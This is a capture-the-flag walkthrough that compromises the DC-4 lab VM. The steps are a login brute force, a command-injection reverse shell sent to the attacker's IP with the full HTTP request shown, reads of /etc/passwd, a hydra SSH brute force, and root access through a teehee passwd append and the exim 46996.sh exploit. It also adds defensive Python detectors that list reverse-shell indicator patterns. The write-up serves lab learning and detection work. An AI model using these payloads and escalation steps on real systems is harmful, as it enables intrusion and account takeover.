DC-4 target machine notes

Gather information with nmap: sudo nmap -p- -sS -A -sV -vv ip
```
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp6/VowbK8MWfMDQsxHRV2yvL8ZO+FEkyIBPnDwTVKkJiVKaJMZ5ztAwTnkc30c3tvC/yCqDAJ5IbHzgvR3kHKS37d17K+/OLxalDutFjrWjG7mBxhMW/0gnrCqJokZBDXDuvHQonajsfSN6FmWoP0PDsfL8NQXwWIoMvTRYHtiEQqczV5CYZZtMKuOyiLCiWINUqKMwY+PTb0M9RzSGYSJvN8sZZnvIw/xU7xBCmaWuq8h2dIfsxy+FhrwZMhvhJOpBYtwZB+hos3bbV5FKHhVztxEo+Y2vyKTl6MXJ4qwCChJdaBAip/aUt1zDoF3cIb+yebteyDk8KIqmp5Ju4r
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIbZ4PXPXShXCcbe25IY3SYbzB4hxP4K2BliUGtuYSABZosGlLlL1Pi214yCLs3ORpGxsRIHv8R0KFQX+5SNSog=
|   256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDcvQZ2DbLqSSOzIbIXhyrDJ15duVKd9TEtxfX35ubsM
80/tcp open  http    syn-ack ttl 64 nginx 1.15.10
|_http-title: System Tools
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.15.10
```
Visiting port 80, index.php is a login page.
Directory scanning turned up nothing.
Tried brute-forcing the login.
Obtained the credentials: username admin, password happy.
Found that command.php has an RCE; for convenience, tried a reverse shell.
Payload:
```
POST /command.php HTTP/1.1
Host: 172.16.40.99
Content-Length: 77
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.16.40.99
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.40.99/command.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e93bqfedkkqs9resg42gcf1473
Connection: close

radio=bash+-c+'exec+bash+-i+%26>/dev/tcp/172.16.40.97/20000+<%261'&submit=Run
```
Listen on the attacking machine: nc -lvvp 20000
Connection established:

```
listening on [any] 20000 ...
172.16.40.99: inverse host lookup failed: Unknown host
connect to [172.16.40.97] from (UNKNOWN) [172.16.40.99] 43194
bash: cannot set terminal process group (453): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dc-4:/usr/share/nginx/html$
www-data@dc-4:/usr/share/nginx/html$ python -c 'import pty; pty.spawn("/bin/bash")'
<tml$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@dc-4:/usr/share/nginx/html$ ls
ls
command.php  css  images  index.php  login.php  logout.php
```
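From the defender's side, the request above is what a request-body inspector should catch: the `radio` field carries a value that is not one of the page's menu entries and, once URL-decoded, contains `/dev/tcp/` and `bash -i`. The following added example (mine, not code from this writeup or from the DC-4 VM) decodes URL-encoded form bodies and flags values that fall outside a fixed menu or carry such indicators. It assumes a log that records POST bodies, written here as constructed tab-separated `client<TAB>path<TAB>body` records, and a constructed `ALLOWED_RADIO` menu; nginx's default access log stores no request body, which is itself the visibility gap this illustrates.

```python
"""Flag command-injection / reverse-shell indicators in URL-encoded POST bodies.

Added example for this writeup; not part of the original page or of the DC-4 VM.
Assumptions (constructed): a request log with tab-separated records
'client_ip<TAB>path<TAB>body' and a fixed menu of allowed 'radio' values.
"""
import re
from urllib.parse import parse_qs

# Selections a "System Tools" page is assumed to offer. Constructed allowlist,
# not the real command.php menu.
ALLOWED_RADIO = {"ls -l", "df -h", "du -h"}

# Indicators checked against the DECODED field value.
INDICATORS = [
    (re.compile(r"/dev/tcp/"), "bash network redirection"),
    (re.compile(r"\bbash\s+-i\b"), "interactive bash"),
    (re.compile(r"\bnc\b.*\s-e\s"), "netcat with -e"),
    (re.compile(r"[;&|`$]"), "shell metacharacter"),
    (re.compile(r"\bpython[23]?\s+-c\b"), "inline python"),
]


def decode_body(body: str) -> dict:
    """Decode application/x-www-form-urlencoded text into {field: first value}.

    parse_qs turns '+' into ' ' and '%26' into '&'. Matching must happen on the
    decoded value: on the raw line the injected '&' is hidden as %26, so a grep
    for '&>' against the raw body would miss it.
    """
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def analyze_body(body: str) -> list:
    """Return a list of finding labels for one request body (empty if clean)."""
    findings = []
    radio = decode_body(body).get("radio")
    if radio is None:
        return findings
    if radio not in ALLOWED_RADIO:
        findings.append("radio value outside allowlist")
    for pattern, label in INDICATORS:
        if pattern.search(radio):
            findings.append(label)
    return findings


def scan_log(lines) -> list:
    """Scan constructed 'client<TAB>path<TAB>body' records for /command.php posts.

    Returns [(client_ip, findings)] for records that tripped at least one rule.
    """
    hits = []
    for line in lines:
        line = line.rstrip("\n")
        if not line:
            continue
        client, path, body = line.split("\t", 2)
        if path != "/command.php":
            continue
        findings = analyze_body(body)
        if findings:
            hits.append((client, findings))
    return hits


# Constructed sample records: one benign menu selection, the reverse-shell body
# from the writeup, and an unrelated login post that the scanner ignores.
SAMPLE_LOG = [
    "172.16.40.50\t/command.php\tradio=ls+-l&submit=Run",
    "172.16.40.97\t/command.php\tradio=bash+-c+'exec+bash+-i+%26>/dev/tcp/172.16.40.97/20000+<%261'&submit=Run",
    "172.16.40.51\t/index.php\tusername=admin&password=guess1",
]

if __name__ == "__main__":
    for client, findings in scan_log(SAMPLE_LOG):
        print(client, ", ".join(findings))
```

The allowlist check is the one that matters most: any `radio` value that is not literally one of the menu entries is already an anomaly for a page that only offers a handful of buttons, and it keeps working when an attacker varies the payload enough to dodge the pattern list.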
Check the current privileges:

```
www-data@dc-4:/usr/share/nginx/html$ whoami
www-data
```
Use ls to view the current directory:

```
www-data@dc-4:/usr/share/nginx/html$ ls
command.php  css  images  index.php  login.php  logout.php
```
Reading the passwd file shows that several users exist:

```
www-data@dc-4:/usr/share/nginx/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
Debian-exim:x:108:112::/var/spool/exim4:/bin/false
```
Entering the home directory shows three users:

```
www-data@dc-4:/home$ ls
charles  jim  sam
```
Entering each of the three user directories, only jim's contains files:

```
www-data@dc-4:/home/jim$ ls
backups  mbox  test.sh
```
Entering backups reveals a password backup file:

```
www-data@dc-4:/home/jim/backups$ ls
old-passwords.bak
```
Try brute-forcing SSH with the file just obtained: hydra -l jim -P old-passwords.bak ssh://172.16.40.99
The password is found: [22][ssh] host: 172.16.40.99 login: jim password: jibril04
Log in to the system as jim; searching around finds Charles's password ^xHhA&hvim0y:
```
jim@dc-4:~$ cd /var/mail/
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
	(envelope-from <charles@dc-4>)
	id 1hCjIX-0000kO-Qt
	for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles
```
Log in as Charles and run sudo -l.
teehee can be run as root:
```
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
```
Privilege escalation attempt 1 (teehee)

teehee is a niche Linux editor. If it can be run with sudo, it can be used to escalate privileges. The core idea is to use it to append a user entry with uid 0 to the passwd file:

```
echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
```

Under the Linux account mechanism, if an account has no shadow entry and its password field in passwd is empty, it can be logged into locally with su and an empty password. So simply running su raaj logs in as raaj, and because that user has uid 0 it also has root privileges.
The teehee escalation succeeds and root is obtained:

```
charles@dc-4:~$ echo "superman01::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
superman01::0:0:::/bin/bash
charles@dc-4:~$ su superman01
bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
root@dc-4:/home/charles# whoami
root
```
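The teehee step leaves durable residue: a second uid-0 line in /etc/passwd, with an empty password field, no matching shadow entry and no home directory. Those are exactly the properties a periodic account audit should flag. The following added example (mine, not part of this writeup or the DC-4 VM) parses passwd-style text, optionally cross-checks it against shadow, and reports uid-0 accounts other than root, empty password fields, password hashes kept in passwd instead of shadow, accounts missing from shadow, duplicate names and malformed lines. `SAMPLE_PASSWD` and `SAMPLE_SHADOW` are constructed from the box's user list with the appended superman01 line and placeholder hashes; `audit_files()` runs the same checks on the live files.

```python
"""Audit /etc/passwd-style content for the residue of an appended uid-0 account.

Added example for this writeup; not part of the original page or the DC-4 VM.
The embedded samples are constructed; audit_files() reads the real files.
"""
import sys

# Values in the passwd password field that mean "see shadow" or "locked".
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!"}
NON_INTERACTIVE_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def audit_passwd(passwd_text: str, shadow_text: str = None) -> list:
    """Return [(line_number, message)] findings for passwd-style text.

    If shadow_text is given, every passwd account must also have a shadow line.
    """
    shadow_names = None
    if shadow_text is not None:
        shadow_names = {line.split(":", 1)[0] for line in shadow_text.splitlines() if line.strip()}

    findings = []
    seen = set()
    for lineno, raw in enumerate(passwd_text.splitlines(), 1):
        if not raw.strip():
            continue
        parts = raw.split(":")
        if len(parts) != 7:
            # A truncated or over-long line is suspicious in its own right.
            findings.append((lineno, f"malformed entry with {len(parts)} fields"))
            continue
        name, pw, uid, gid, _gecos, home, shell = parts
        if name in seen:
            findings.append((lineno, f"duplicate account name {name}"))
        seen.add(name)
        if not uid.isdigit() or not gid.isdigit():
            findings.append((lineno, f"non-numeric uid/gid for {name}"))
            continue
        if int(uid) == 0 and name != "root":
            findings.append((lineno, f"uid 0 account other than root: {name}"))
        if pw == "":
            # Empty field: no password is required to switch to this account.
            findings.append((lineno, f"empty password field: {name}"))
        elif pw not in SHADOW_PLACEHOLDERS:
            findings.append((lineno, f"password hash kept in passwd instead of shadow: {name}"))
        if shadow_names is not None and name not in shadow_names:
            findings.append((lineno, f"no shadow entry for {name}"))
        if home == "" and shell not in NON_INTERACTIVE_SHELLS:
            findings.append((lineno, f"interactive shell with empty home directory: {name}"))
    return findings


def audit_files(passwd_path: str = "/etc/passwd", shadow_path: str = "/etc/shadow") -> list:
    """Audit the live files; the shadow cross-check is skipped without root."""
    with open(passwd_path) as fh:
        passwd_text = fh.read()
    shadow_text = None
    try:
        with open(shadow_path) as fh:
            shadow_text = fh.read()
    except PermissionError:
        pass
    return audit_passwd(passwd_text, shadow_text)


# Constructed sample: a trimmed copy of the box's passwd plus the appended line.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
superman01::0:0:::/bin/bash
"""

# Constructed shadow with placeholder hashes; only the account names matter here.
SAMPLE_SHADOW = """\
root:$6$PLACEHOLDER:17000:0:99999:7:::
daemon:*:17000:0:99999:7:::
www-data:*:17000:0:99999:7:::
charles:$6$PLACEHOLDER:17000:0:99999:7:::
jim:$6$PLACEHOLDER:17000:0:99999:7:::
sam:$6$PLACEHOLDER:17000:0:99999:7:::
"""

if __name__ == "__main__":
    results = audit_files() if "--live" in sys.argv else audit_passwd(SAMPLE_PASSWD, SAMPLE_SHADOW)
    for lineno, message in results:
        print(f"line {lineno}: {message}")
```

Run without arguments it audits the embedded sample and reports four findings, all on the superman01 line; with `--live` it audits the host. The same mindset applies to the sudo rule that made the append possible: any `NOPASSWD` entry for a binary that can write arbitrary files is equivalent to root, whatever the binary is called.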
Privilege escalation attempt 2 (exim4)

As user jim, looking for SUID escalation paths reveals exim4, version 4.89:
```
jim@dc-4:/var/mail$ find / -user root -perm /4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
```
```
jim@dc-4:/usr/lib/exim4$ ./exim4 --version
Exim version 4.89 #2 built 10-Feb-2018 08:26:05
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
```
Searching for exim on Kali shows the following exploitable entries:

```
------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                 |  Path
------------------------------------------------------------------------------- ---------------------------------
Dovecot with Exim - 'sender_address' Remote Command Execution                  | linux/remote/25297.txt
Exim 3.x - Format String                                                        | linux/local/20900.txt
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow                           | linux/local/756.c
Exim 4.41 - 'dns_build_reverse' Local Read Emails                               | linux/local/1009.c
Exim 4.42 - Local Privilege Escalation                                          | linux/local/796.sh
Exim 4.43 - 'auth_spa_server()' Remote                                          | linux/remote/812.c
Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit)         | linux/remote/16925.rb
Exim 4.63 - Remote Command Execution                                            | linux/remote/15725.pl
Exim 4.84-3 - Local Privilege Escalation                                        | linux/local/39535.sh
Exim < 4.86.2 - Local Privilege Escalation                                      | linux/local/39549.txt
Exim 4.87 - 4.91 - Local Privilege Escalation                                   | linux/local/46996.sh
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)                      | linux/local/47307.rb
Exim 4.87 < 4.91 - (Local / Remote) Command Execution                           | linux/remote/46974.txt
Exim 4.89 - 'BDAT' Denial of Service                                            | multiple/dos/43184.txt
Exim < 4.90.1 - 'base64d' Remote Code Execution                                 | linux/remote/44571.py
exim 4.90 - Remote Code Execution                                               | linux/remote/45671.py
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation                   | linux/local/40054.c
Exim Buffer 1.6.2/1.6.51 - Local Overflow                                       | unix/local/20333.c
Exim ESMTP 4.80 - glibc gethostbyname Denial of Service                         | linux/dos/35951.py
Exim - 'GHOST' glibc gethostbyname Buffer Overflow (Metasploit)                 | linux/remote/36421.rb
Exim Internet Mailer 3.35/3.36/4.10 - Format String                             | linux/local/22066.c
Exim - 'perl_startup' Local Privilege Escalation (Metasploit)                   | linux/local/39702.rb
Exim Sender 3.35 - Verification Remote Stack Buffer Overrun                     | linux/remote/24093.c
Exim - 'sender_address' Remote Code Execution                                   | linux/remote/25970.py
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution                        | php/webapps/42221.py
------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
After trying them, 46996.sh works. Upload the payload to the target with scp:
```
scp 46996.sh jim@172.16.40.99:/home/jim
```
Escalation succeeds:

```
jim@dc-4:~$ ./46996.sh
/bin/bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Preparing setuid shell helper...

Delivering setuid payload...
220 dc-4 ESMTP Exim 4.89 Tue, 13 Sep 2022 17:26:04 +1000
250 dc-4 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1oY0J2-0000EC-7b
221 dc-4 closing connection

Waiting 5 seconds...
-rwsr-xr-x 1 root jim 7500 Sep 13 17:26 /tmp/pwned

# whoami
root
```
Find the flag:

```
root@dc-4:/home/charles# find / -name "*flag*.txt"
/root/flag.txt
root@dc-4:/home/charles# cat /root/flag.txt
(ASCII-art banner; its layout did not survive extraction)

Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those who have provided feedback, and who have taken time to complete these little challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
```
Sum-up

Port scan found 80 and 22 open.
Obtained the web username and password by brute force.
The command page has an RCE -> reverse shell.
/home/jim contains a backup of jim's old passwords -> hydra brute force -> log in as jim.
1) Charles's password found in mail -> log in as Charles -> sudo -l -> escalate via the teehee editor.
2) Search for a usable SUID escalation path -> exim4 escalation.
find (as root) to locate the flag file.